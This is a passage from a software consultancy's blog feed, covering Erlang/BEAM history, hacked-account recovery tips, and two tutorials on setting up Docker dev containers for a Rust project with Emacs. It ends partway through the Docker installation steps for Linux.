&lt;p&gt;The period between 2006 and 2014 was when the focus noticeably shifted from innovation to stabilization. This era was marked by a concerted effort to make BEAM more stable and efficient, an endeavor that, while crucial, came at the cost of slowing down on the innovation front.&lt;/p&gt;
&lt;p&gt;During this time, the OTP (Open Telecom Platform) team, operating under the age-old adage of &amp;quot;the golden rule&amp;quot; - that is, &#39;whoever has the gold makes the rules&#39; - followed a path largely dictated by Ericsson&#39;s immediate needs. Ericsson, having become heavily dependent on Erlang for its revenue-generating projects, preferred a conservative approach. Their goal was clear: ensure the smooth running of existing systems and avoid any disruptions that might arise from overly ambitious innovations. It&#39;s a bit like being at a rock concert where the band decides to play only ballads; necessary for a breather, but you do miss the high-energy numbers.&lt;/p&gt;
&lt;p&gt;In this environment, much of the OTP team&#39;s work centered around enhancing the efficiency and stability of BEAM. This included the introduction of the multi-core version, which could now
deliver true parallelism, something that most Erlang programs could take advantage of
immediately and automatically, without rewriting a single line of application code.&lt;/p&gt;
&lt;p&gt;Several enhancements to ETS (Erlang Term Storage) tables and other performance optimizations
were also introduced. However, this shift also meant dialing back on some of the experimental features that HiPE had introduced. Features like hybrid heaps, parameterized modules, namespaces, and the just-in-time aspects of the HiPE compiler and loader were gradually removed to simplify maintenance.&lt;/p&gt;
&lt;p&gt;Eventually, this would lead to the complete phasing out of HiPE a number of years later, when it was replaced by a simpler JIT compiler in 2020, bringing the native code story back full circle. It was a bit like saying goodbye to a favorite experimental band that had once headlined festivals but was now playing in small clubs. While its contributions were significant and propelled BEAM forward, the need for a stable, easily maintainable system took precedence in the strategic decisions of the OTP team.&lt;/p&gt;
&lt;p&gt;This phase in Erlang&#39;s history highlights a common trajectory in technology development where, after a period of rapid innovation and experimentation, a consolidation phase is necessary. It underscores the balancing act between pushing the boundaries of innovation and ensuring the reliability and stability of technology, especially when it forms the backbone of infrastructure like telecommunications.&lt;/p&gt;
&lt;h2 id=&quot;klarna-challenging-and-enhancing-erlangs-limits&quot; tabindex=&quot;-1&quot;&gt;Klarna: Challenging and Enhancing Erlang&#39;s Limits&lt;/h2&gt;
&lt;p&gt;During this Stabilization Era, my professional journey found me at Klarna, where I was deeply involved in working with Erlang&#39;s runtime system. At Klarna, we were not just passive observers of the developments in the Erlang community; instead, we were actively pushing the Erlang Runtime System (ERTS) to its limits. This period was marked by a rigorous process of identifying, understanding, and resolving various challenges within ERTS, contributing to its overall stability and efficiency.&lt;/p&gt;
&lt;p&gt;I have written more about the &lt;a href=&quot;https://happihacking.com/blog/posts/2023/Installment_plans/&quot;&gt;Klarna era and the projects we worked on&lt;/a&gt; in a separate series.&lt;/p&gt;
&lt;p&gt;One of the notable challenges we encountered at Klarna was the limitation of process memory in ERTS, even on 64-bit systems. We discovered that a single Erlang process could not hold more than 32 GB of data, a constraint that posed significant challenges given the scale at which we were operating. This finding was crucial as it highlighted a fundamental limitation in the system, prompting us to dig deeper into Erlang&#39;s memory management mechanisms.&lt;/p&gt;
&lt;p&gt;Another issue we observed was related to the behavior of the schedulers. In some instances, the schedulers in ERTS could become a bit too eager to enter a sleep state, which, while efficient in some contexts, could lead to performance bottlenecks under certain workloads. Addressing this required a careful rebalancing of the scheduler&#39;s responsiveness, ensuring that they remained alert enough to handle fluctuating demands efficiently.&lt;/p&gt;
&lt;p&gt;Additionally, we tackled challenges with long-running built-in functions (BIFs). These functions could occasionally block the schedulers for extended periods. In extreme cases, this could trigger the HEART mechanism, Erlang&#39;s watchdog, to erroneously conclude that the system was unresponsive and initiate a restart. Such scenarios were not just theoretical concerns but real issues that we needed to address to maintain the reliability of our systems.&lt;/p&gt;
&lt;p&gt;We also grappled with issues related to memory usage, particularly concerning large binaries. References to these large binaries could get inadvertently &#39;stuck&#39; in processes, leading to substantial, and often unnecessary, memory consumption. This was a subtle yet significant issue, as it could lead to gradual memory bloat, impacting the system&#39;s overall performance and stability.&lt;/p&gt;
&lt;p&gt;One interesting system limitation resulted in our systems consistently crashing after a code upgrade. Yes, we did hot code loading of new releases at that time. The only hint on what was going wrong was a printout directly to the terminal of a sad face &amp;quot;:(&amp;quot;. This did not end up in any logs, so we first had to try to reproduce the error locally before we could see it. After some searching in the code, we found out that the system printed the sad face and exited if the hard-coded size of the number of exception handlers was exceeded. The developer of that code had very graciously left a comment: &amp;quot;This should probably be dynamically allocated.&amp;quot;&lt;/p&gt;
&lt;p&gt;My time at Klarna during this era was not just about addressing these challenges; it was also about contributing to the broader Erlang ecosystem. The issues we identified and the solutions we developed helped in enhancing the robustness of ERTS. It was a period that underscored the importance of real-world applications in revealing the limitations of a system and the collaborative nature of problem-solving in the open-source community. The experience at Klarna was like being in a high-stakes game where every discovery and improvement not only benefitted us but I think also enriched the entire Erlang community.&lt;/p&gt;
&lt;h2 id=&quot;elixirs-emergence-invigorating-the-erlang-ecosystem&quot; tabindex=&quot;-1&quot;&gt;Elixir&#39;s Emergence: Invigorating the Erlang Ecosystem&lt;/h2&gt;
&lt;p&gt;The emergence of Elixir in 2011 marked a new chapter in the story of Erlang. Created by José Valim, Elixir is a dynamic, functional language built on the Erlang VM (BEAM) and designed for building scalable and maintainable applications with an initial focus on web technologies. Elixir’s arrival had a profound impact on the Erlang community, infusing it with fresh energy and attracting a new wave of developers.&lt;/p&gt;
&lt;p&gt;Elixir managed to bridge a gap in the backend development community. Its modern syntax and tooling, combined with the robustness of the Erlang VM, made it appealing to a broader audience, including those who might have found Erlang&#39;s syntax and conventions challenging. This influx of new talent and ideas brought about a rejuvenation in the community, sparking renewed interest and innovative approaches to solving backend problems.&lt;/p&gt;
&lt;p&gt;From my perspective, Elixir&#39;s contribution to the Erlang ecosystem is akin to a revitalizing rain shower over a fertile field. It not only nourished the existing landscape but also encouraged new growth, diversifying and enriching the ecosystem. The presence of Elixir helped in popularizing some of Erlang&#39;s core principles, such as concurrency and fault tolerance, to a wider audience, thereby reinforcing the relevance of these ideas in modern software development.&lt;/p&gt;
&lt;h2 id=&quot;the-beam-book-chronicle-of-a-virtual-machine&quot; tabindex=&quot;-1&quot;&gt;The BEAM Book: Chronicle of a Virtual Machine&lt;/h2&gt;
&lt;p&gt;Following the emergence of Elixir and the energizing effect it had on the Erlang community, I started writing &amp;quot;The BEAM Book.&amp;quot; This project is a comprehensive documentation of the BEAM virtual machine, designed to provide an in-depth look into its inner workings, principles, and capabilities.&lt;/p&gt;
&lt;p&gt;The BEAM Book is an effort to encapsulate the rich history and technical intricacies of BEAM. I have written about &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the_beam_book_lessons/&quot;&gt;the lessons from writing it&lt;/a&gt; and &lt;a href=&quot;https://happihacking.com/blog/posts/2025/why_I_wrote_theBEAMBook/&quot;&gt;why I wrote it&lt;/a&gt; in later posts. It&#39;s intended to serve as both a historical record and a technical guide, offering insights into the design decisions, architectural nuances, and the operational mechanics of BEAM.&lt;/p&gt;
&lt;p&gt;My work on this book is driven by a desire to share knowledge and insights gathered over years of working closely with Erlang and BEAM. It&#39;s meant to be a resource for those who want to understand the depths of BEAM&#39;s capabilities, for developers who build systems on it, and for enthusiasts who wish to explore the underpinnings of this powerful virtual machine.&lt;/p&gt;
&lt;p&gt;The BEAM Book project is also a reflection of my commitment to the Erlang and Elixir communities. It&#39;s a way of giving back, of contributing to the collective knowledge base that has been so instrumental in the growth and success of these technologies. This endeavor is like charting the course of a great river - capturing its origins, its meandering journey, and the many ways it has enriched the lands through which it flows.&lt;/p&gt;
&lt;h1 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;My nearly 30 years in this field have been a testament to the dynamic, ever-evolving nature of software development, where each new discovery builds upon the last.&lt;/p&gt;
&lt;p&gt;I encourage you, the readers, to reflect on your own experiences with Erlang, BEAM, or Elixir. Consider how these technologies have influenced your professional path and how you have interacted with these communities. Whether your role has been that of a developer, a scholar, or an enthusiast, your experiences and contributions are valuable chapters in this ongoing story. It is through our collective efforts and shared knowledge that these technologies continue to thrive and evolve, underpinning some of the most innovative and robust systems in the world today.&lt;/p&gt;
&lt;p&gt;I realize that each experience, each challenge, and each triumph has not only shaped my understanding of this technology but has also prepared me for my next endeavor. I am excited to announce that I will be building upon this history in my upcoming talk titled &amp;quot;30 Years On and In the Beam: Mastering Concurrency.&amp;quot; In this presentation, I plan to cover some technical aspects of BEAM, exploring some of its peculiarities and offering insights into designing effective concurrent systems.&lt;/p&gt;
&lt;p&gt;This talk is an opportunity to share knowledge, engage with new ideas, and continue learning from the community that has been a big part of this journey. I invite you to join me in this discussion, where we can learn more about concurrent programming and explore the BEAM together.&lt;/p&gt;
&lt;p&gt;For more details and to register for the event, please visit &lt;a href=&quot;https://codebeamamerica.com/keynotes/30-years-on-and-in-the-beam/&quot;&gt;30 Years On and In the Beam. Mastering Concurrency&lt;/a&gt;. I look forward to the opportunity to connect, share, and learn together. Hope to see you there!&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/GoldenGate.JPG&quot; alt=&quot;A view of the Golden Gate Bridge in fog from one of my earlier visits to Erlang Factory in SF.&quot; title=&quot;A view of the Golden Gate Bridge in fog from one of my earlier visits to Erlang Factory in SF.&quot; /&gt;</content>
  </entry>
  
  <entry>
    <title>Recovering from a Hacked Social Media Account</title>
    <link href="https://happihacking.com/blog/posts/2023/hacked/"/>
    <updated>2023-10-17T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/hacked/</id>
    <summary>A Quick Guide</summary>
    <content type="html">&lt;p&gt;If you&#39;ve observed unusual activity on your account or can&#39;t access it, you&#39;re not the only one. Let&#39;s go through the steps to regain control.&lt;/p&gt;
&lt;p&gt;When you first suspect unauthorized access to your account, resetting your password as soon as possible is essential. Most platforms, including Facebook and Instagram, have a straightforward process on their login pages to help you do this, usually requiring your registered email or phone number. After regaining access, you should review your activity log to identify and rectify any unfamiliar actions. Additionally, consider logging out of all sessions on other devices and turning on two-factor authentication for added security. This feature enhances security by sending a verification code to your phone during login.&lt;/p&gt;
&lt;p&gt;Several platforms offer dedicated pages to guide users through the recovery process:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Google&lt;/strong&gt;: &lt;a href=&quot;https://support.google.com/accounts/answer/6294825?hl=en&quot;&gt;Recovery Link&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Facebook&lt;/strong&gt;: &lt;a href=&quot;https://www.facebook.com/help/105487009541643&quot;&gt;Recovery Link&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Instagram&lt;/strong&gt;: &lt;a href=&quot;https://www.instagram.com/hacked/&quot;&gt;Recovery Link&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Maintaining the security of your accounts is an ongoing process. One practical approach is to use tools such as LastPass or 1Password. These tools not only store passwords securely but can also generate strong combinations tailored for each account. Moreover, monitoring the devices and locations accessing your account is prudent. Regularly reviewing this can alert you to any unauthorized access attempts. Lastly, keep up with the latest hacking techniques and potential threats; staying informed puts you in the best position to protect your accounts.&lt;/p&gt;
&lt;p&gt;At HappiHacking, our expertise lies in software optimization and organizational growth. Yet, we recognize the paramount importance of online security in today&#39;s connected world. We have therefore written a guide on what to do if you get hacked &lt;a href=&quot;https://happihacking.com/hacked/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Dev Containers Part 2: Setup, the devcontainer CLI &amp; Emacs</title>
    <link href="https://happihacking.com/blog/posts/2023/dev-containers-emacs/"/>
    <updated>2023-08-11T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/dev-containers-emacs/</id>
    <summary>Bring Your Emacs Friends to the Party</summary>
    <content type="html">&lt;p&gt;In the &lt;a href=&quot;https://happihacking.com/blog/posts/2023/dev-containers/&quot;&gt;previous
post&lt;/a&gt;, we
could read about how to use dev containers to streamline your developer
workflow, and the benefits of containerizing, well, everything.&lt;/p&gt;
&lt;p&gt;In this post I will walk you through my process of getting a
containerized development environment for a small Rust project up and
running using the &lt;code&gt;devcontainer&lt;/code&gt; CLI. I will also show how to access
this environment using Emacs.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/gnu3.jpeg&quot; alt=&quot;A GNU in a container&quot; title=&quot;A GNU in a container&quot; /&gt;
&lt;p&gt;But first, a quick recap.&lt;/p&gt;
&lt;h2 id=&quot;what-is-a-dev-container&quot; tabindex=&quot;-1&quot;&gt;What is a Dev Container?&lt;/h2&gt;
&lt;p&gt;I&#39;m assuming some familiarity with Docker and containerization here.&lt;/p&gt;
&lt;p&gt;A dev container is in its simplest form a docker container with
two important modifications:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Your workspace/source code folder is shared between the container&#39;s
file system and your host file system, such that any changes made
to the files inside the container persist should the container
stop or restart.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;While a classic container generally has a single &lt;code&gt;CMD&lt;/code&gt; instruction
that, for example, runs the relevant application, a dev container
instead simply starts and does nothing, thus allowing you to
connect to it and start hacking away.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
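&lt;p&gt;For intuition, those two modifications correspond roughly to a bind mount plus a no-op command in plain Docker. The following is an illustrative sketch only, with a placeholder image and paths; it is not what the &lt;code&gt;devcontainer&lt;/code&gt; CLI actually runs under the hood:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;# Sketch: a &amp;quot;dev container&amp;quot; by hand (placeholder image and paths).
# 1. Bind-mount the workspace so changes persist on the host.
# 2. Replace the usual CMD with a no-op so the container just stays up.
docker run -d \
  -v &amp;quot;$PWD&amp;quot;:/workspaces/my-project \
  -w /workspaces/my-project \
  rust:1 \
  sleep infinity
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You could then attach to such a container with &lt;code&gt;docker exec -it &amp;lt;CONTAINER ID&amp;gt; bash&lt;/code&gt; and work inside it; the devcontainer tooling automates this pattern, along with building the image from your configuration.&lt;/p&gt;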
&lt;h2 id=&quot;project-setup&quot; tabindex=&quot;-1&quot;&gt;Project Setup&lt;/h2&gt;
&lt;p&gt;To follow along, you will need &lt;a href=&quot;https://www.docker.com/&quot;&gt;Docker&lt;/a&gt; and the &lt;a href=&quot;https://github.com/devcontainers/cli&quot;&gt;devcontainer CLI&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As mentioned, this will be a Rust project, and we will thus be using
&lt;a href=&quot;https://doc.rust-lang.org/cargo/&quot;&gt;Cargo&lt;/a&gt;, the Rust package manager,
to set it up. Though, in the spirit of containerization, we will do
it from inside the container, meaning we will not need to have it
installed on our host machine.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;We&#39;ll create a project folder to hold our Rust project (the &lt;code&gt;cargo&lt;/code&gt; initialization happens later, from inside the container):&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mkdir rust-dev-container &amp;amp;&amp;amp; cd rust-dev-container
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Inside our project folder, we create another folder named
&lt;code&gt;.devcontainer&lt;/code&gt;, and two files inside that folder:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mkdir .devcontainer &amp;amp;&amp;amp; touch .devcontainer/Dockerfile &amp;amp;&amp;amp; touch .devcontainer/devcontainer.json
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;Dockerfile&lt;/code&gt; will specify our development environment, and the
&lt;code&gt;devcontainer.json&lt;/code&gt; file will simply refer to the dockerfile.&lt;/p&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;Fill the &lt;code&gt;Dockerfile&lt;/code&gt; with the following content:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-docker&quot;&gt;FROM mcr.microsoft.com/devcontainers/rust:0-1-bullseye

# Add rust-analyzer download and setup.
# Note: this release artifact is for aarch64; on x86_64 hosts, download
# rust-analyzer-x86_64-unknown-linux-gnu.gz instead.
RUN curl -L https://github.com/rust-lang/rust-analyzer/releases/download/2023-08-07/rust-analyzer-aarch64-unknown-linux-gnu.gz -o /usr/bin/rust-analyzer.gz
RUN gzip -d /usr/bin/rust-analyzer.gz
RUN chmod +x /usr/bin/rust-analyzer
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We will use a Rust Docker image from Microsoft, and add the
&lt;code&gt;rust-analyzer&lt;/code&gt; language server, which we will need to get
IntelliSense features in Emacs.&lt;/p&gt;
&lt;ol start=&quot;4&quot;&gt;
&lt;li&gt;Fill the &lt;code&gt;devcontainer.json&lt;/code&gt; file with the following content:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
  &amp;quot;name&amp;quot;: &amp;quot;Rust Dev Container&amp;quot;,
    &amp;quot;build&amp;quot; : {
      &amp;quot;dockerfile&amp;quot; : &amp;quot;Dockerfile&amp;quot;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As mentioned, we simply reference the &lt;code&gt;Dockerfile&lt;/code&gt;.&lt;/p&gt;
&lt;ol start=&quot;5&quot;&gt;
&lt;li&gt;Now, assuming docker is running, and the devcontainer CLI is
available, we simply run the following command from our workspace folder:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;devcontainer up --workspace-folder .
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will spin up the container, which means that we are basically
done. From this point we can connect to our container and start
developing.&lt;/p&gt;
&lt;ol start=&quot;6&quot;&gt;
&lt;li&gt;As a last step, we will initialize the project from inside the
container by running the following command:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;devcontainer exec --workspace-folder . cargo init
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will run &lt;code&gt;cargo init&lt;/code&gt; inside our workspace folder inside the
container. Since this folder is connected to the folder you are
currently in, you can do a simple &lt;code&gt;ls&lt;/code&gt; and see the changes on your
host machine.&lt;/p&gt;
&lt;p&gt;And we are done!&lt;/p&gt;
&lt;p&gt;This is basically all there is to setting up a dev container. In the
next section we will connect to the container through Emacs and Tramp.&lt;/p&gt;
&lt;h2 id=&quot;emacs-tramp&quot; tabindex=&quot;-1&quot;&gt;Emacs &amp;amp; Tramp&lt;/h2&gt;
&lt;p&gt;Working inside a container works exactly like working on a remote
machine, which works almost identically to working on your own
machine. The Emacs module that allows this is called &lt;a href=&quot;https://www.gnu.org/software/tramp/&quot;&gt;Tramp&lt;/a&gt;. You simply prefix the file you want to open with
&lt;code&gt;/docker:&amp;lt;CONTAINER ID&amp;gt;:&lt;/code&gt;. To find your container ID, you can run
&lt;code&gt;docker ps&lt;/code&gt; in a terminal. Inside the container, the workspace folder
is located at &lt;code&gt;/workspaces/&lt;/code&gt;. In our case, I&#39;d do &lt;code&gt;M-x find-file&lt;/code&gt; and
then enter:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;/docker:7cdf905ea9e8:/workspaces/rust-dev-container/src/main.rs
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then simply start writing code.&lt;/p&gt;
&lt;p&gt;NOTE: This is true for Emacs 29
and later. For earlier versions, you need &lt;a href=&quot;https://github.com/emacs-pe/docker-tramp.el&quot;&gt;this
package&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To get IntelliSense features, I use &lt;code&gt;eglot&lt;/code&gt; (which comes with Emacs
from version 29), an LSP client, and &lt;code&gt;rustic&lt;/code&gt;, a Rust mode. Eglot
automatically finds the &lt;code&gt;rust-analyzer&lt;/code&gt; binary that we specified in
the Dockerfile. To get &lt;code&gt;rustic&lt;/code&gt; to work properly I had to tell it
where to find the &lt;code&gt;cargo&lt;/code&gt; binary inside the container.&lt;/p&gt;
&lt;p&gt;This is how I have configured those packages (using &lt;a href=&quot;https://jwiegley.github.io/use-package/&quot;&gt;use-package&lt;/a&gt;):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elisp&quot;&gt;(use-package eglot
  :config
  (setq eglot-events-buffer-size 0
        eglot-ignored-server-capabilities &#39;(:inlayHintProvider)
        eglot-confirm-server-initiated-edits nil))

(use-package rustic
  :config
  ; Tell rustic where to find the cargo binary
  (setq rustic-cargo-bin-remote &amp;quot;/usr/local/cargo/bin/cargo&amp;quot;)
  (setq rustic-lsp-client &#39;eglot))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is how the containerized project looks from my Emacs frame:&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/emacs_dev_container.png&quot; alt=&quot;Containerized project in Emacs&quot; title=&quot;Containerized project in Emacs&quot; /&gt;
&lt;p&gt;My full Emacs configuration can be found &lt;a href=&quot;https://github.com/maxperea/emacs-conf/&quot;&gt;here&lt;/a&gt;.
It is heavily inspired by &lt;a href=&quot;https://github.com/doomemacs/doomemacs&quot;&gt;Doom Emacs&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Dev containers are a great way to streamline the setup of your
development environment, and you can even invite your Emacs-using
friends to the party.&lt;/p&gt;
&lt;p&gt;Thanks for reading, and good luck with your projects!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Dev Containers: Consistency in Development</title>
    <link href="https://happihacking.com/blog/posts/2023/dev-containers/"/>
    <updated>2023-07-24T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/dev-containers/</id>
    <summary>Finding Freedom in Confinement</summary>
    <content type="html">&lt;h2 id=&quot;dev-containers-turtles-all-the-way-down&quot; tabindex=&quot;-1&quot;&gt;Dev Containers: Turtles all the way down&lt;/h2&gt;
&lt;p&gt;Dev Containers might just be the key to streamlining your development workflow. These tools provide a consistent, isolated, and reproducible development environment. No more &amp;quot;but it works on my machine&amp;quot; excuses. With dev containers, if it works on one machine, it works on all.&lt;/p&gt;
&lt;p&gt;In this article, we&#39;ll explore what dev containers are, their benefits, and how to set one up. We&#39;ll delve into the nuts and bolts of creating and configuring your own dev container, and by the end, you&#39;ll be equipped with the knowledge to bring your development environment into the 21st century.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/lego_turtle_crop.jpg&quot; alt=&quot;A Lego turtle.&quot; title=&quot;A Lego turtle.&quot; /&gt;
&lt;p&gt;If you&#39;ve ever heard the phrase &amp;quot;It&#39;s turtles all the way down&amp;quot;, you&#39;ll find it surprisingly relevant here. Especially if you&#39;re working on Windows in WSL2 or on a Mac where the dev environments are usually Linux-based, much like the live environment. But more on that later.&lt;/p&gt;
&lt;p&gt;Back in the early 2000s, I was part of a team working on Simics, a cycle-accurate full system simulator. Simics was a game-changer in the world of software development. It introduced the ability to run programs backwards, a feature that was nothing short of revolutionary. This meant that developers could step back through their code execution, making it easier to identify and fix bugs.&lt;/p&gt;
&lt;p&gt;But that&#39;s not all. Simics also made it possible to simulate hardware that didn&#39;t even exist yet. This was a significant breakthrough, as it allowed software development to proceed in parallel with hardware development.&lt;/p&gt;
&lt;p&gt;For instance, Microsoft was able to develop a 64-bit version of Windows before the 64-bit hardware was even available. This was a significant advantage, as it allowed Microsoft to hit the ground running when the hardware was finally released.&lt;/p&gt;
&lt;p&gt;IBM also leveraged Simics to develop a 64-bit version of their operating system OS/2. This parallel development of hardware and software was a significant shift in the industry, and it was all made possible by Simics.&lt;/p&gt;
&lt;p&gt;Around the same time, VMware and VirtualBox were also making waves in the world of virtualization. VirtualBox allowed developers to run multiple operating systems on a single machine, which was a significant step forward in terms of flexibility and efficiency.&lt;/p&gt;
&lt;p&gt;VMware&#39;s technology was revolutionary at the time. It allowed businesses to partition a physical server into multiple virtual machines, each capable of running its own operating system and applications. This meant that businesses could get more value from their physical servers, reducing costs and improving efficiency.&lt;/p&gt;
&lt;p&gt;These tools, Simics, VMware, and VirtualBox, were the precursors to the easy virtualization we enjoy today with Docker. They laid the groundwork for what we now know as dev containers, and their influence can still be seen in the way we develop software today.&lt;/p&gt;
&lt;p&gt;Before we get into the how of running dev containers, let&#39;s talk about the why. Why should you consider using dev containers? What makes them worth the effort of setting up? Well, let&#39;s find out.&lt;/p&gt;
&lt;p&gt;Here are the main benefits:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Consistency&lt;/strong&gt;: The &amp;quot;it works on my machine&amp;quot; syndrome is a developer&#39;s nightmare. Dev containers squash this issue. Everyone works with the same environment, eliminating the gap between local and production setups. Moreover, if done right this consistency extends to testing and live environments, ensuring that your application behaves as expected across all stages. At Happi Hacking we are experts in doing this right and we would be happy to help you set things up the right way.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quick Setup&lt;/strong&gt;: Setting up a new project or jumping between projects can be time-consuming. With dev containers, you can get up and running in no time. No need to install and configure each dependency manually, the container has it all ready for you.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Simplified Onboarding&lt;/strong&gt;: New team member? No problem. With dev containers, they can hit the ground running. Pull the container, start coding. It&#39;s that simple.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Collaboration&lt;/strong&gt;: Sharing your work environment is as simple as sharing your container configuration. This facilitates collaboration, whether you&#39;re pair programming or debugging.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dependency Management&lt;/strong&gt;: Dev containers keep your project and its dependencies in their own neat little box. This means no more conflicts between projects that require different versions of the same dependency.&lt;/p&gt;
&lt;h2 id=&quot;what-is-a-dev-container&quot; tabindex=&quot;-1&quot;&gt;What is a Dev Container?&lt;/h2&gt;
&lt;p&gt;A Dev Container, or Development Container, is a virtual environment tailored for software development. It&#39;s a self-contained unit that houses your project and all its dependencies. Think of it as a mini-computer, living inside your actual computer, that you can set up to match your project&#39;s needs exactly.&lt;/p&gt;
&lt;p&gt;Dev Containers work by leveraging containerization technology. If you&#39;re familiar with Docker, you&#39;re halfway there. Docker allows us to package an application along with its environment into a container. A Dev Container takes this a step further and packages not just the application, but the entire development environment.&lt;/p&gt;
&lt;p&gt;This means your Dev Container includes the specific version of the programming language you&#39;re using, any libraries or frameworks your project depends on, and even the development tools and extensions you need. Everything is pre-configured and ready to go.&lt;/p&gt;
&lt;p&gt;The beauty of this is that a Dev Container is portable. You can share it with your team, ensuring everyone is working in the same environment. You can run it on different machines, knowing it will behave the same way. You can even version control it, so you can go back to a previous setup if needed.&lt;/p&gt;
&lt;h2 id=&quot;creating-and-optimizing-your-dev-containers-a-practical-guide&quot; tabindex=&quot;-1&quot;&gt;Creating and Optimizing Your Dev Containers: A Practical Guide&lt;/h2&gt;
&lt;p&gt;Setting up a basic dev container is a straightforward process. You start by installing Docker on your machine.&lt;/p&gt;
&lt;h3 id=&quot;installing-docker-on-windows-wsl2&quot; tabindex=&quot;-1&quot;&gt;Installing Docker on Windows (WSL2):&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Install Windows Subsystem for Linux (WSL) and upgrade to WSL2. You can follow &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/wsl/install&quot;&gt;Microsoft&#39;s official guide to do this.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Download Docker Desktop for Windows from &lt;a href=&quot;https://docs.docker.com/desktop/install/windows-install/&quot;&gt;Docker&#39;s official website&lt;/a&gt; and install it. During installation, ensure that you select the option to use WSL2 instead of Hyper-V.&lt;/li&gt;
&lt;li&gt;After installation, Docker Desktop will automatically use WSL2.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id=&quot;installing-docker-on-mac&quot; tabindex=&quot;-1&quot;&gt;Installing Docker on Mac:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Download Docker Desktop for Mac from &lt;a href=&quot;https://docs.docker.com/desktop/install/mac-install/&quot;&gt;Docker&#39;s official website.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Open the Docker.dmg file you downloaded and drag the Docker app to your Applications folder.&lt;/li&gt;
&lt;li&gt;Open Docker Desktop from your Applications folder. You&#39;ll see a whale icon in your top status bar indicating that Docker is running.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id=&quot;installing-docker-on-linux&quot; tabindex=&quot;-1&quot;&gt;Installing Docker on Linux:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Update your existing list of packages:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo apt-get update
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Install a few prerequisite packages which let apt use packages over HTTPS:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo apt-get install apt-transport-https ca-certificates curl software-properties-common
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;Add the GPG key for the official Docker repository to your system:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;4&quot;&gt;
&lt;li&gt;Add the Docker repository to APT sources:&lt;/li&gt;
&lt;/ol&gt;
